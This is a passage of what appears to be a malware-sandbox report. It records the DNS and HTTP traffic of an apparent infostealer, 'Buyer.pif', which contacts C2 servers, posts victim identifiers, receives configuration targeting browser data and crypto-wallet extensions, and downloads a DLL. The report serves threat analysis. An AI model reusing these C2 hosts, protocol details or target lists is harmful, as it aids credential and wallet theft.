                                                                                                  Jul 26, 2024 19:57:59.214076996 CEST192.168.2.51.1.1.10x5869Standard query (0)BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLWA (IP address)IN (0x0001)false
                                                                                                  Jul 26, 2024 19:58:10.498976946 CEST192.168.2.51.1.1.10x93d3Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                  Jul 26, 2024 19:58:49.023668051 CEST192.168.2.51.1.1.10x7a92Standard query (0)arpdabl.zapto.orgA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jul 26, 2024 19:57:59.225172043 CEST1.1.1.1192.168.2.50x5869Name error (3)BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLWnonenoneA (IP address)IN (0x0001)false
                                                                                                  Jul 26, 2024 19:58:10.506475925 CEST1.1.1.1192.168.2.50x93d3No error (0)steamcommunity.com23.192.247.89A (IP address)IN (0x0001)false
                                                                                                  Jul 26, 2024 19:58:49.033422947 CEST1.1.1.1192.168.2.50x7a92No error (0)arpdabl.zapto.org77.91.101.71A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • steamcommunity.com
                                                                                                  • 5.75.212.60
                                                                                                  • arpdabl.zapto.org

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.54973477.91.101.71802380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jul 26, 2024 19:58:49.044064045 CEST329OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----GCGIDGCGIEGDGDGDGHJK
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: arpdabl.zapto.org
                                                                                                  Content-Length: 3257
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Jul 26, 2024 19:58:49.044167995 CEST3257OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63
                                                                                                  Data Ascii: ------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------GCGIDGCGIEGDGD
                                                                                                  Jul 26, 2024 19:58:49.953210115 CEST161INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.22.1
                                                                                                  Date: Fri, 26 Jul 2024 17:58:49 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 0
                                                                                                  Connection: keep-alive


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.54970423.192.247.894432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:11 UTC119OUTGET /profiles/76561199747278259 HTTP/1.1
                                                                                                  Host: steamcommunity.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:11 UTC1870INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                  Cache-Control: no-cache
                                                                                                  Date: Fri, 26 Jul 2024 17:58:11 GMT
                                                                                                  Content-Length: 34725
                                                                                                  Connection: close
                                                                                                  Set-Cookie: sessionid=9f9e4d729e0920652d8fedd0; Path=/; Secure; SameSite=None
                                                                                                  Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                  2024-07-26 17:58:11 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                  2024-07-26 17:58:11 UTC10062INData Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e
                                                                                                  Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
                                                                                                  2024-07-26 17:58:11 UTC10149INData Raw: 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f
                                                                                                  Data Ascii: kamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.5497055.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:12 UTC230OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:13 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:13 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.5497075.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:13 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJE
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 279
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:13 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 32 30 31 44 35 43 36 31 41 33 33 39 37 33 35 34 34 31 38 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                  Data Ascii: ------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="hwid"B9201D5C61A33973544187-a33c7340-61ca-11ee-8c18-806e6f6e6963------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------
                                                                                                  2024-07-26 17:58:14 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:14 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:14 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 3a1|1|1|1|77eaecbc48c2111ef5dc32770e101018|1|1|1|0|0|50000|10


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.5497115.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:15 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDB
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 331
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------JJJJDAAECGHDGDGCGHDBCont
                                                                                                  2024-07-26 17:58:15 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:15 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:15 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                  Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.5497145.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:16 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJD
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 331
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:16 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------GIJJKKJJDAAAAAKFHJJDCont
                                                                                                  2024-07-26 17:58:17 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:17 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:17 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                  Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.5497155.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:17 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 332
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:17 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------IIJDBGDGCGDAKFIDGIDBCont
                                                                                                  2024-07-26 17:58:18 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:18 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:18 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.5497165.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:19 UTC323OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 6129
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:19 UTC6129OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------FHIECBAFBFHIJKFIJDAKCont
                                                                                                  2024-07-26 17:58:19 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:19 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 2ok0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.5497175.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:20 UTC238OUTGET /sqls.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:21 UTC261INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:20 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 2459136
                                                                                                  Connection: close
                                                                                                  Last-Modified: Friday, 26-Jul-2024 17:58:20 GMT
